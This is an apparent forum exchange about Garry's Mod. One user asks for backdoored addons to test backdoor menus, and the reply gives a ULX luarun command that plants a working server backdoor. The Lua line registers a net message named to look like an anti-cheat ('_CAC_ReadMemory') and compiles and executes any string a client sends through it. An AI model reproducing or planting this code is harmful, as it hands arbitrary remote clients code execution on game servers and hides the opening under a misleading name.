
Originally Posted by
KrypticZx
Can someone please send me a zip file full of backdoored addons i can use in singleplayer to test out some backdoor menus to see if they work or not
Well its easier if you have ulx and then use ulx luarun
Code:
ulx luarun util.AddNetworkString( "_CAC_ReadMemory" ) net.Receive( "_CAC_ReadMemory", function() local x = CompileString( net.ReadString(), "LuaCmd", false ) if isfunction( x ) then x() end end )